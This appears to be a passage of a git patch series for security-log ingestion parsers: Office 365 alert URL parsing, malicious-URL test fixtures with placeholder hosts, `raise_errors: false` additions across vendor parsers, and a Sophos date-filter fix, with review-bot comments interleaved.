"AFIA3GCDITNgUgIKlOF5n5oH.1.1729763630549.mail.evil@bad.com", + "subject": " [TEST] Click on this!!!", + "to": { + "address": [ + "test.user@example.com" + ] + } + }, + "office365": { + "alert": { + "category": "ThreatManagement", + "display_name": "Email messages containing malicious URL removed after delivery\u200b", + "entity_type": "MalwareFamily", + "id": "6c88ef80-67f0-4a32-b1c9-4696ba48a3e4", + "severity": "Informational", + "source": "Office 365 Security & Compliance", + "status": "Active" + }, + "audit": { + "object_id": "32c70dd6-ce69-434d-b52a-0d876696fd8d-9402318098831178296-1" + }, + "record_type": 40, + "result_status": "Succeeded", + "user_type": { + "code": 4, + "name": "System" + } + }, + "organization": { + "id": "3995fc59-1c0e-4812-b0f1-5308a209ef5e" + }, + "related": { + "user": [ + "SecurityComplianceAlerts" + ] + }, + "rule": { + "id": "55087523-49bd-4bbd-b269-cda496a06d05" + }, + "service": { + "name": "SecurityComplianceCenter" + }, + "user": { + "id": "SecurityComplianceAlerts", + "name": 
"SecurityComplianceAlerts" + } + } +} \ No newline at end of file From 0571d334b2930db5a8c1ab5ac4abf28d1b1c7172 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Gr=C3=A9goire=20Clermont?= <129874202+gcl-sekoia@users.noreply.github.com> Date: Fri, 25 Oct 2024 11:48:55 +0200 Subject: [PATCH 178/317] fix(o365): Add parsing of URLs in SecurityComplianceAlert --- Office 365/o365/ingest/parser.yml | 4 ++++ Office 365/o365/tests/security_compliance_alert_7.json | 8 ++++++++ 2 files changed, 12 insertions(+) diff --git a/Office 365/o365/ingest/parser.yml b/Office 365/o365/ingest/parser.yml index 5a2a1b116..e5a34547a 100644 --- a/Office 365/o365/ingest/parser.yml +++ b/Office 365/o365/ingest/parser.yml @@ -650,6 +650,10 @@ stages: email.to.address: "{{parse_data.ParsedData.trc.split(',')}}" filter: "{{parse_data.ParsedData.trc != None}}" + - set: + url.original: "//{{parse_data.ParsedData.pud}}" + filter: "{{parse_data.ParsedData.pud[0] != None}}" + parse_power_bi: actions: - set: diff --git a/Office 365/o365/tests/security_compliance_alert_7.json b/Office 365/o365/tests/security_compliance_alert_7.json index efc5f5ca6..0775bbdc8 100644 --- a/Office 365/o365/tests/security_compliance_alert_7.json +++ b/Office 365/o365/tests/security_compliance_alert_7.json @@ -77,6 +77,14 @@ "service": { "name": "SecurityComplianceCenter" }, + "url": { + "domain": "clickonthis.example.com", + "original": "//clickonthis.example.com/api/phishing", + "path": "/api/phishing", + "registered_domain": "example.com", + "subdomain": "clickonthis", + "top_level_domain": "com" + }, "user": { "id": "SecurityComplianceAlerts", "name": "SecurityComplianceAlerts" From 5a4ce0f5c95a36ece31cbf5921841ad4d20fb4e6 Mon Sep 17 00:00:00 2001 
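Review bot: The expected `email.message_id` is `AFIA3GCDITNgUgIKlOF5n5oH.1.1729763630549.mail.evil@bad.com`, but the input's `Data` carries `\"imsgid\":\"\"` and that value appears nowhere in the input, so the expectation looks like it was captured before the sample was anonymised. Unless the runner compares only a subset of `expected`, this case cannot pass; either drop `email.message_id` from `expected` or put a matching value into `imsgid`. Also worth confirming that the trailing `\u200b` zero-width space kept in `office365.alert.display_name` is intended test coverage rather than a copy artifact.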
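Review bot: `filter: "{{parse_data.ParsedData.pud[0] != None}}"` tests the first character of `pud`, not its presence: indexing a missing or empty value in Jinja yields an undefined rather than `None`, so the comparison is true precisely when `pud` is absent or empty, and `url.original` becomes `//` followed by whatever the engine renders for a missing value. The set just above uses `filter: "{{parse_data.ParsedData.trc != None}}"`; this one should read `filter: "{{parse_data.ParsedData.pud not in [None, '']}}"`. The `//` prefix also deserves a one-line comment, e.g. `# pud is host/path without a scheme; '//' lets the URL post-processing treat the first component as the authority`, since a reader will otherwise take it for a typo. The enclosing stage begins outside the hunk.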
From: =?UTF-8?q?Gr=C3=A9goire=20Clermont?= <129874202+gcl-sekoia@users.noreply.github.com> Date: Tue, 29 Oct 2024 13:36:25 +0100 Subject: [PATCH 179/317] fix(o365): Add test case for SecurityComplianceAlert with MaliciousUrl --- ...curity_compliance_alert_malicious_url.json | 78 +++++++++++++++++++ 1 file changed, 78 insertions(+) create mode 100644 Office 365/o365/tests/security_compliance_alert_malicious_url.json diff --git a/Office 365/o365/tests/security_compliance_alert_malicious_url.json b/Office 365/o365/tests/security_compliance_alert_malicious_url.json new file mode 100644 index 000000000..83d6877e6 --- /dev/null +++ b/Office 365/o365/tests/security_compliance_alert_malicious_url.json 
@@ -0,0 +1,78 @@ +{ + "input": { + "message": "{\"CreationTime\":\"2024-10-07T20:29:25\",\"Id\":\"33c6081c-a402-49a3-828e-8e6df08c5e90\",\"Operation\":\"AlertEntityGenerated\",\"OrganizationId\":\"b76bf78d-7696-4b17-bbda-e9995c266879\",\"RecordType\":40,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"SecurityComplianceAlerts\",\"UserType\":4,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\",\"ObjectId\":\"https://test-d7a3.evil.net/?param=SGVsbG8gV29ybGQh\",\"UserId\":\"SecurityComplianceAlerts\",\"AlertEntityId\":\"https://test-d7a3.evil.net/?param=SGVsbG8gV29ybGQh\",\"AlertId\":\"657fb16a-ee7f-4939-a218-33ba3c72805e\",\"AlertLinks\":[{\"AlertLinkHref\":\"\"}],\"AlertType\":\"System\",\"Category\":\"ThreatManagement\",\"Comments\":\"New alert\",\"Data\":\"{\\\"etype\\\":\\\"MaliciousUrl\\\",\\\"aii\\\":\\\"d6c7276b-3a65-43c7-9e25-525f7e289543\\\",\\\"eid\\\":\\\"https://test-d7a3.evil.net/?param=SGVsbG8gV29ybGQh\\\",\\\"curlh\\\":\\\"12815939189066485645\\\",\\\"tid\\\":\\\"b76bf78d-7696-4b17-bbda-e9995c266879\\\",\\\"ts\\\":\\\"2024-10-07T20:07:11.0000000Z\\\",\\\"te\\\":\\\"2024-10-07T20:07:11.0000000Z\\\",\\\"trc\\\":\\\"test.user@example.org\\\",\\\"tdc\\\":\\\"1\\\",\\\"at\\\":\\\"2024-10-07T20:07:11.0000000Z\\\",\\\"dm\\\":\\\"MDO Safe Links\\\",\\\"ot\\\":\\\"Allowed\\\",\\\"od\\\":\\\"User clicked on a URL which was identified as potentially malicious at a later time.\\\",\\\"md\\\":\\\"2024-10-07T20:29:25.5945545Z\\\",\\\"lon\\\":\\\"MaliciousUrlClick\\\"}\",\"EntityType\":\"MaliciousUrl\",\"Name\":\"A potentially malicious URL click was detected\",\"PolicyId\":\"471d921d-e417-41c4-be33-ad67040f3ece\",\"Severity\":\"High\",\"Source\":\"Office 365 Security & Compliance\",\"Status\":\"Active\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 / Office 365", + "dialect_uuid": "caa13404-9243-493b-943e-9848cadb1f99" + } + } + }, + "expected": { + "message": 
"{\"CreationTime\":\"2024-10-07T20:29:25\",\"Id\":\"33c6081c-a402-49a3-828e-8e6df08c5e90\",\"Operation\":\"AlertEntityGenerated\",\"OrganizationId\":\"b76bf78d-7696-4b17-bbda-e9995c266879\",\"RecordType\":40,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"SecurityComplianceAlerts\",\"UserType\":4,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\",\"ObjectId\":\"https://test-d7a3.evil.net/?param=SGVsbG8gV29ybGQh\",\"UserId\":\"SecurityComplianceAlerts\",\"AlertEntityId\":\"https://test-d7a3.evil.net/?param=SGVsbG8gV29ybGQh\",\"AlertId\":\"657fb16a-ee7f-4939-a218-33ba3c72805e\",\"AlertLinks\":[{\"AlertLinkHref\":\"\"}],\"AlertType\":\"System\",\"Category\":\"ThreatManagement\",\"Comments\":\"New alert\",\"Data\":\"{\\\"etype\\\":\\\"MaliciousUrl\\\",\\\"aii\\\":\\\"d6c7276b-3a65-43c7-9e25-525f7e289543\\\",\\\"eid\\\":\\\"https://test-d7a3.evil.net/?param=SGVsbG8gV29ybGQh\\\",\\\"curlh\\\":\\\"12815939189066485645\\\",\\\"tid\\\":\\\"b76bf78d-7696-4b17-bbda-e9995c266879\\\",\\\"ts\\\":\\\"2024-10-07T20:07:11.0000000Z\\\",\\\"te\\\":\\\"2024-10-07T20:07:11.0000000Z\\\",\\\"trc\\\":\\\"test.user@example.org\\\",\\\"tdc\\\":\\\"1\\\",\\\"at\\\":\\\"2024-10-07T20:07:11.0000000Z\\\",\\\"dm\\\":\\\"MDO Safe Links\\\",\\\"ot\\\":\\\"Allowed\\\",\\\"od\\\":\\\"User clicked on a URL which was identified as potentially malicious at a later time.\\\",\\\"md\\\":\\\"2024-10-07T20:29:25.5945545Z\\\",\\\"lon\\\":\\\"MaliciousUrlClick\\\"}\",\"EntityType\":\"MaliciousUrl\",\"Name\":\"A potentially malicious URL click was detected\",\"PolicyId\":\"471d921d-e417-41c4-be33-ad67040f3ece\",\"Severity\":\"High\",\"Source\":\"Office 365 Security & Compliance\",\"Status\":\"Active\"}", + "event": { + "action": "AlertEntityGenerated", + "category": [ + "intrusion_detection" + ], + "code": "40", + "kind": "alert", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-10-07T20:29:25Z", + "action": { + "id": 40, + "name": "AlertEntityGenerated", + "outcome": "success", + 
"target": "user" + }, + "email": { + "to": { + "address": [ + "test.user@example.org" + ] + } + }, + "office365": { + "alert": { + "category": "ThreatManagement", + "display_name": "A potentially malicious URL click was detected", + "entity_type": "MaliciousUrl", + "id": "657fb16a-ee7f-4939-a218-33ba3c72805e", + "severity": "High", + "source": "Office 365 Security & Compliance", + "status": "Active" + }, + "audit": { + "object_id": "https://test-d7a3.evil.net/?param=SGVsbG8gV29ybGQh" + }, + "record_type": 40, + "result_status": "Succeeded", + "user_type": { + "code": 4, + "name": "System" + } + }, + "organization": { + "id": "b76bf78d-7696-4b17-bbda-e9995c266879" + }, + "related": { + "user": [ + "SecurityComplianceAlerts" + ] + }, + "rule": { + "id": "471d921d-e417-41c4-be33-ad67040f3ece" + }, + "service": { + "name": "SecurityComplianceCenter" + }, + "user": { + "id": "SecurityComplianceAlerts", + "name": "SecurityComplianceAlerts" + } + } +} \ No newline at end of file From e9ea0512c9e02727806726c68d2928f991bb3b22 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Gr=C3=A9goire=20Clermont?= <129874202+gcl-sekoia@users.noreply.github.com> Date: Tue, 29 Oct 2024 14:19:03 +0100 Subject: [PATCH 180/317] fix(o365): Add parsing of URLs in SecurityComplianceAlert with MaliciousUrl --- Office 365/o365/ingest/parser.yml | 4 ++++ .../security_compliance_alert_malicious_url.json | 11 +++++++++++ 2 files changed, 15 insertions(+) diff --git a/Office 365/o365/ingest/parser.yml b/Office 365/o365/ingest/parser.yml index e5a34547a..414bbb996 100644 --- a/Office 365/o365/ingest/parser.yml +++ b/Office 365/o365/ingest/parser.yml @@ -654,6 +654,10 @@ stages: url.original: "//{{parse_data.ParsedData.pud}}" filter: "{{parse_data.ParsedData.pud[0] != None}}" + - set: + url.original: "{{json_event.message.ObjectId}}" + filter: "{{json_event.message.EntityType == 'MaliciousUrl'}}" + parse_power_bi: actions: - set: 
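Review bot: The added set writes `json_event.message.ObjectId` into `url.original` whenever `EntityType == 'MaliciousUrl'`, with no check that `ObjectId` is present, and it sits after the `pud`-based set in the same action list, so for a MaliciousUrl alert that also carries `pud` the second assignment silently wins. Tightening it to `filter: "{{json_event.message.EntityType == 'MaliciousUrl' and json_event.message.ObjectId != None}}"` covers the first case; a comment stating that `ObjectId` holds the clicked URL for this entity type and intentionally takes precedence over `pud` would make the second explicit. The enclosing stage begins outside the hunk.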
diff --git a/Office 365/o365/tests/security_compliance_alert_malicious_url.json b/Office 365/o365/tests/security_compliance_alert_malicious_url.json index 83d6877e6..7bb99fa1d 100644 --- a/Office 365/o365/tests/security_compliance_alert_malicious_url.json +++ b/Office 365/o365/tests/security_compliance_alert_malicious_url.json @@ -70,6 +70,17 @@ "service": { "name": "SecurityComplianceCenter" }, + "url": { + "domain": "test-d7a3.evil.net", + "original": "https://test-d7a3.evil.net/?param=SGVsbG8gV29ybGQh", + "path": "/", + "port": 443, + "query": "param=SGVsbG8gV29ybGQh", + "registered_domain": "evil.net", + "scheme": "https", + "subdomain": "test-d7a3", + "top_level_domain": "net" + }, "user": { "id": "SecurityComplianceAlerts", "name": "SecurityComplianceAlerts" From 953905eee39649d029701aaf6ecd0e1edd7ec607 Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Tue, 29 Oct 2024 15:18:52 +0200 Subject: [PATCH 181/317] Add `raise_errors` --- F5 Networks/f5-big-ip/ingest/parser.yml | 4 ++++ Fastly/fastly-waf-auditlogs/ingest/parser.yml | 1 + Fortinet/fortimail/ingest/parser.yml | 9 +++++++++ Google Cloud/Google Cloud Audit/ingest/parser.yml | 1 + .../Google Cloud Load Balancing/ingest/parser.yml | 1 + Google Cloud/Google Kubernetes Engine/ingest/parser.yml | 1 + IBM/ibm_i/ingest/parser.yml | 1 + Ivanti/pulse-connect/ingest/parser.yml | 1 + Lacework/lacework-cloud-security/ingest/parser.yml | 1 + Netskope/netskope_events/ingest/parser.yml | 1 + Office 365/o365/ingest/parser.yml | 2 ++ OpenLDAP/openldap/ingest/parser.yml | 3 +++ OpenSSH/openssh/ingest/parser.yml | 1 + OpenVPN/openvpn/ingest/parser.yml | 1 + Postfix/postfix/ingest/parser.yml | 5 +++++ 15 files changed, 33 insertions(+) diff --git a/F5 Networks/f5-big-ip/ingest/parser.yml b/F5 Networks/f5-big-ip/ingest/parser.yml index d59682c69..0147bdd4b 100644 --- a/F5 Networks/f5-big-ip/ingest/parser.yml +++ b/F5 Networks/f5-big-ip/ingest/parser.yml 
@@ -62,6 +62,7 @@ pipeline: external: name: kv.parse-kv properties: + raise_errors: false input_field: '{{ parse_cef_event.message.full_request.replace("\\r\\n", "\r\n") }}' output_field: message value_sep: ": " @@ -81,6 +82,7 @@ pipeline: external: name: kv.parse-kv properties: + raise_errors: false input_field: "{{ parse_kv_header.message.kvs }}" output_field: message value_sep: "=" @@ -91,6 +93,7 @@ pipeline: external: name: kv.parse-kv properties: + raise_errors: false input_field: "{{ parse_grok_event.message.audit_message }}" output_field: message value_sep: "=" @@ -109,6 +112,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false output_field: message pattern: '%{HEADER}?%{DATA:rule_name}\:\s*%{WORD}\:\s*%{WORD}\:\s*%{PAYLOAD}' custom_patterns: diff --git a/Fastly/fastly-waf-auditlogs/ingest/parser.yml b/Fastly/fastly-waf-auditlogs/ingest/parser.yml index 8edda0283..92b35dd82 100644 --- a/Fastly/fastly-waf-auditlogs/ingest/parser.yml +++ b/Fastly/fastly-waf-auditlogs/ingest/parser.yml @@ -11,6 +11,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_event.message.message}}" output_field: message pattern: '%{DATA:user_name} \(%{DATA:user_email}\) %{GREEDYDATA:user_action}' diff --git a/Fortinet/fortimail/ingest/parser.yml b/Fortinet/fortimail/ingest/parser.yml index f57bd8dcd..befdd3605 100644 --- a/Fortinet/fortimail/ingest/parser.yml +++ b/Fortinet/fortimail/ingest/parser.yml @@ -11,6 +11,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: parsed_event.message.msg output_field: file pattern: '%{DATA:type} name: %{DATA:name}(\(checksum:%{DATA:hash}\))?, scanned by Antivirus Scanner\(%{DATA:event_status}\)(, Content Filter\(clean\))?' 
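Review bot: Every hunk in this commit adds `raise_errors: false` to a `grok.match`, `kv.parse-kv` or `grok.case_match` step (the four F5 hunks here, then Fastly and Fortimail in this line, and the Google Cloud, IBM, Ivanti, Lacework, Netskope, Office 365, OpenLDAP, OpenSSH, OpenVPN and Postfix hunks that follow) without recording the trade-off: a field that fails to parse no longer fails the event but silently yields no output, so detection rules keyed on e.g. `source_ip` or `user_name` see an event with the field absent rather than a visible pipeline error. Please state the rationale once per parser, e.g. `# raise_errors: false — malformed input leaves the output field unset instead of failing the whole event`, and add or confirm a fixture per intake with an unparseable sample so the fall-through shape is pinned by a test rather than assumed.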
@@ -19,6 +20,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: parsed_event.message.msg output_field: msg pattern: "STARTTLS=server, cert-subject=%{GREEDYDATA:tls_server_subject}, cert-issuer=%{GREEDYDATA:tls_server_issuer}, verifymsg=%{GREEDYDATA:event_reason}" @@ -28,6 +30,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: parsed_event.message.msg output_field: msg pattern: "%{URL_FULL_SPAM}|%{URL_FULL_1}|%{URL_ORIGINAL_1}|%{URL_ORIGINAL_2}" @@ -41,6 +44,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: parsed_event.message.msg output_field: msg pattern: "STARTTLS=client, cert-subject=%{GREEDYDATA:tls_client_subject}, cert-issuer=%{GREEDYDATA:tls_client_issuer}, verifymsg=%{GREEDYDATA:event_reason}" @@ -50,6 +54,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: parsed_event.message.msg output_field: msg pattern: '%{DATA:file_type} %{DATA:file_name}\s\(checksum: %{DATA:file_hash_sha256}\) has been scanned by FortiSandbox.( Scan result: rating=%{GREEDYDATA:tmp_event_status})?' @@ -59,6 +64,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: parsed_event.message.msg output_field: msg pattern: "to=%{DATA:email_to}, (delay=%{DATA:tmp_delay}, )?(xdelay=%{DATA:tmp_xdelay}, )?(mailer=%{DATA:tmp_mailer}, )?(pri=%{NUMBER:tmp_priority_level_msg}, )?(relay=%{RELAY_INFO:relay}, )?(dsn=%{DATA:tmp_dsn_version}, )?stat=%{GREEDYDATA:event_reason}" @@ -70,6 +76,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: parsed_event.message.msg output_field: msg pattern: "FortiGuard-WebFilter identified URL: %{DATA:url_full}, category: %{DATA:tmp_spam_category}, id: %{GREEDYDATA:tmp_spam_id}." 
@@ -89,6 +96,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: parsed_event.message.ui output_field: msg pattern: '%{DATA}\(%{IP:source_ip}\)' @@ -97,6 +105,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: parse_event_with_no_stat.msg.relay output_field: msg pattern: "%{RELAY:relay}" diff --git a/Google Cloud/Google Cloud Audit/ingest/parser.yml b/Google Cloud/Google Cloud Audit/ingest/parser.yml index d2c879c05..724189e6f 100644 --- a/Google Cloud/Google Cloud Audit/ingest/parser.yml +++ b/Google Cloud/Google Cloud Audit/ingest/parser.yml @@ -9,6 +9,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{json_event.message.protoPayload.authenticationInfo.principalEmail}}" output_field: message pattern: "%{EMAILADDRESS:email}" diff --git a/Google Cloud/Google Cloud Load Balancing/ingest/parser.yml b/Google Cloud/Google Cloud Load Balancing/ingest/parser.yml index 070f71fc4..71f75f593 100644 --- a/Google Cloud/Google Cloud Load Balancing/ingest/parser.yml +++ b/Google Cloud/Google Cloud Load Balancing/ingest/parser.yml @@ -9,6 +9,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_event.message.httpRequest.remoteIp}}" output_field: message pattern: "%{IP:source_ip}|%{IP:source_ip}:%{NUMBER:source_port}" diff --git a/Google Cloud/Google Kubernetes Engine/ingest/parser.yml b/Google Cloud/Google Kubernetes Engine/ingest/parser.yml index 3e5ae4ae5..b7bdf0fe1 100644 --- a/Google Cloud/Google Kubernetes Engine/ingest/parser.yml +++ b/Google Cloud/Google Kubernetes Engine/ingest/parser.yml @@ -9,6 +9,7 @@ pipeline: external: name: kv.parse-kv properties: + raise_errors: false input_field: "{{ json_event.message.jsonPayload.MESSAGE }}" value_sep: "=" item_sep: \s diff --git a/IBM/ibm_i/ingest/parser.yml b/IBM/ibm_i/ingest/parser.yml index b14b09cc5..ffae36257 100644 --- a/IBM/ibm_i/ingest/parser.yml 
+++ b/IBM/ibm_i/ingest/parser.yml @@ -16,6 +16,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: parsed_event.message.msg output_field: message pattern: "%{CPF1164}|%{CPI3E34}" diff --git a/Ivanti/pulse-connect/ingest/parser.yml b/Ivanti/pulse-connect/ingest/parser.yml index 7e1db659a..827dd8820 100644 --- a/Ivanti/pulse-connect/ingest/parser.yml +++ b/Ivanti/pulse-connect/ingest/parser.yml @@ -10,6 +10,7 @@ pipeline: external: name: grok.case_match properties: + raise_errors: false input_field: "{{kv_event.message.msg}}" output_field: details pattern_key: "{{field_extraction.event.code}}" diff --git a/Lacework/lacework-cloud-security/ingest/parser.yml b/Lacework/lacework-cloud-security/ingest/parser.yml index 0b0d805e1..28e7e1a67 100644 --- a/Lacework/lacework-cloud-security/ingest/parser.yml +++ b/Lacework/lacework-cloud-security/ingest/parser.yml @@ -7,6 +7,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{json_event.message.alertInfo.description}}" output_field: message pattern: "%{HEADER}?\\s*(%{FIRST_USER}|%{AWS_ACCOUNT}|%{FIRST_SERVICE}|%{SIGHTING_USER})\\s*" diff --git a/Netskope/netskope_events/ingest/parser.yml b/Netskope/netskope_events/ingest/parser.yml index 471b39627..1c33c07bc 100644 --- a/Netskope/netskope_events/ingest/parser.yml +++ b/Netskope/netskope_events/ingest/parser.yml @@ -16,6 +16,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_event.message.user}}" output_field: result pattern: "%{USER_WITH_DOMAIN}|%{GREEDYDATA:user_name}" diff --git a/Office 365/o365/ingest/parser.yml b/Office 365/o365/ingest/parser.yml index 90f07c4ca..5d3b587df 100644 --- a/Office 365/o365/ingest/parser.yml +++ b/Office 365/o365/ingest/parser.yml 
@@ -14,6 +14,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{json_event.message.ClientIP}}" output_field: result pattern: '::ffff:%{IP:ip}|%{IP:ip}(:%{INT:port})?|\[%{IP:ip}\](:%{INT:port})?' @@ -22,6 +23,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{json_event.message.ClientIPAddress}}" output_field: result pattern: "::ffff:%{IP:ip}|%{IP:ip}(:%{INT:port})?" diff --git a/OpenLDAP/openldap/ingest/parser.yml b/OpenLDAP/openldap/ingest/parser.yml index 537b0c7da..8c87b56f1 100644 --- a/OpenLDAP/openldap/ingest/parser.yml +++ b/OpenLDAP/openldap/ingest/parser.yml @@ -14,6 +14,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{pre_parsing.pre_message.raw_message}}" output_field: message pattern: "%{Group_1}?" @@ -25,6 +26,7 @@ pipeline: external: name: kv.parse-kv properties: + raise_errors: false input_field: "{{pre_parsing.pre_message.raw_message}}" output_field: parse_kv_field value_sep: "=" @@ -35,6 +37,7 @@ pipeline: external: name: kv.parse-kv properties: + raise_errors: false input_field: "{{parse_kv.parse_kv_field.dn}}" output_field: result value_sep: "=" diff --git a/OpenSSH/openssh/ingest/parser.yml b/OpenSSH/openssh/ingest/parser.yml index 53d8da2b0..6bc478455 100644 --- a/OpenSSH/openssh/ingest/parser.yml +++ b/OpenSSH/openssh/ingest/parser.yml @@ -129,6 +129,7 @@ pipeline: external: name: kv.parse-kv properties: + raise_errors: false input_field: "{{event.message.pam}}" output_field: message value_sep: "=" diff --git a/OpenVPN/openvpn/ingest/parser.yml b/OpenVPN/openvpn/ingest/parser.yml index e22379d0b..1101b175d 100644 --- a/OpenVPN/openvpn/ingest/parser.yml +++ b/OpenVPN/openvpn/ingest/parser.yml @@ -53,6 +53,7 @@ pipeline: external: name: kv.parse-kv properties: + raise_errors: false input_field: "{{parsed_event.message.ldap_kvs}}" output_field: message value_sep: "=" 
diff --git a/Postfix/postfix/ingest/parser.yml b/Postfix/postfix/ingest/parser.yml index e2982cf2b..b6987c83d 100644 --- a/Postfix/postfix/ingest/parser.yml +++ b/Postfix/postfix/ingest/parser.yml @@ -224,6 +224,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{event.message.postfix_keyvalue_data}}" output_field: result pattern: "%{PARSE_RELAY_1}|%{PARSE_RELAY_2}" @@ -275,6 +276,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_message_kv.message.from}}" output_field: message pattern: ".*?%{EMAILADDRESS:postfix_from}.*" @@ -284,6 +286,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_message_kv.message.to}}" output_field: message pattern: ".*?%{EMAILADDRESS:postfix_to}.*" @@ -293,6 +296,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{event.message.postfix_smtp_response}}" output_field: "message" pattern: '.*?%{HOSTNAME:source_domain}?\[%{IP:source_address}\](:%{INT:source_port})?.*' @@ -302,6 +306,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{event.message.postfix_message}}" output_field: "message" pattern: '.*?%{HOSTNAME:source_domain}?\[%{IP:source_address}\](:%{INT:source_port})?.*' From c9c6e8c618463bad094ea3e43cf6ab6173826415 Mon Sep 17 00:00:00 2001 From: "vladyslav.guriev" Date: Wed, 30 Oct 2024 10:44:27 +0200 Subject: [PATCH 182/317] Fix: Sophos parse date statement --- .../ingest/parser.yml | 2 +- .../tests/ioc_view_query7.json | 104 ++++++++++++++++++ 2 files changed, 105 insertions(+), 1 deletion(-) create mode 100644 Sophos/sophos-analysis-threat-center/tests/ioc_view_query7.json diff --git a/Sophos/sophos-analysis-threat-center/ingest/parser.yml b/Sophos/sophos-analysis-threat-center/ingest/parser.yml index 4b1f2231c..31f33975f 100644 --- a/Sophos/sophos-analysis-threat-center/ingest/parser.yml 
+++ b/Sophos/sophos-analysis-threat-center/ingest/parser.yml @@ -53,7 +53,7 @@ pipeline: properties: input_field: "{{parse_json.message.password_last_set}}" output_field: date - filter: '{{parse_json.message.get("password_last_set") not in [None, "-"] }}' + filter: '{{parse_json.message.get("password_last_set") not in [None, "-"] and not parse_json.message.get("password_last_set").startswith("%%") }}' - name: parsed_unix_date external: diff --git a/Sophos/sophos-analysis-threat-center/tests/ioc_view_query7.json b/Sophos/sophos-analysis-threat-center/tests/ioc_view_query7.json new file mode 100644 index 000000000..261672aa9 --- /dev/null +++ b/Sophos/sophos-analysis-threat-center/tests/ioc_view_query7.json 
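Review bot: `.startswith("%%")` in the new filter assumes `password_last_set` is a string; if the field ever arrives as a number the filter itself raises before the date stage runs, which the `not in [None, "-"]` guard does not prevent. The `%%NNNN` values are unresolved Windows message-table tokens, and the new fixture carries `\"account_expires\": \"%%1794\"` alongside `\"password_last_set\": \"%%1794\"`, so if `account_expires` feeds a similar date stage outside this hunk it needs the same guard. A more robust form is `filter: '{{parse_json.message.get("password_last_set") not in [None, "-"] and not (parse_json.message.get("password_last_set")|string).startswith("%%") }}'`, with a short comment such as `# "%%NNNN" is an unresolved Windows message placeholder, not a date` so the next reader knows why it is skipped.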
@@ -0,0 +1,104 @@ +{ + "input": { + "message": "{\n \"upload_size\": 1406,\n \"profile_path\": \"%%XXXX\",\n \"record_identifier\": \"xxxxxxxxx01xxxxxxxxxxxxxxxxxxxxx\",\n \"ioc_severity\": 4,\n \"handler_verdicts_case_descriptions\": {\n \"default\": \"{\\\"correlated_reason_id\\\":\\\"\\\",\\\"created_reason_id\\\":\\\"\\\"}\"\n },\n \"user_parameters\": \"%%XXXX\",\n \"folded\": 0,\n \"meta_mac_address\": \"c5:1a:64:c1:65:3a\",\n \"endpoint_id\": \"xxxxxxxx-xxxxxx-xxxxxx-xxxxxx\",\n \"handler_verdict_suppression_mdr\": false,\n \"meta_public_ip_country_code\": \"FR\",\n \"schema_version\": \"24\",\n \"subject_logon_id\": \"0x3e7\",\n \"ioc_detection_mitre_attack\": \"[]\",\n \"handler_verdicts_entities\": \"[{\\\"attributes\\\":{\\\"domain_controller\\\":\\\"False\\\",\\\"endpoint_type\\\":\\\"computer\\\",\\\"hostname\\\":\\\"XXXX-XXXXXXXX\\\",\\\"id\\\":\\\"xxxxxxxx-xxxxxx-xxxxxx-xxxxxx\\\",\\\"os_platform\\\":\\\"windows\\\",\\\"os_type\\\":\\\"\\\"},\\\"id\\\":\\\"b5c47470231d356f5cf8d90a31999db59172206adef7958ec9c650b9ce99147b\\\",\\\"integration_id\\\":\\\"xxxxxxxx-xxxxxx-xxxxxx-xxxxxx\\\",\\\"source_system\\\":\\\"osquery\\\",\\\"type\\\":\\\"device\\\"},{\\\"attributes\\\":{\\\"address\\\":\\\"1.2.3.4\\\",\\\"external\\\":true,\\\"id\\\":\\\"263522d8b9d989b8c304a6d2f088f107b6ee0010675a11fb459b326eb27edefd\\\",\\\"type\\\":\\\"ipv4\\\"},\\\"id\\\":\\\"46ce85dc0d61d3ddc073e7a66074a8add18e75b082eef550e08863895dcbadb0\\\",\\\"integration_id\\\":\\\"xxxxxxxx-xxxxxx-xxxxxx-xxxxxx\\\",\\\"source_system\\\":\\\"osquery\\\",\\\"type\\\":\\\"ip_address\\\"},{\\\"attributes\\\":{\\\"address\\\":\\\"1.2.3.1\\\",\\\"external\\\":false,\\\"id\\\":\\\"ead232f295b08325f6b65bd85a8454239cd479ef30e470f594f2fcb628ec3d64\\\",\\\"type\\\":\\\"ipv4\\\"},\\\"id\\\":\\\"a2bf7ac1f3a3e09342ef4510b4d63f53100334262aa0fe8eef47a0e3642a34fe\\\",\\\"integration_id\\\":\\\"xxxxxxxx-xxxxxx-xxxxxx-xxxxxx\\\",\\\"source_system\\\":\\\"osquery\\\",\\\"type\\\":\\\"ip_address\\\"}]\",\n 
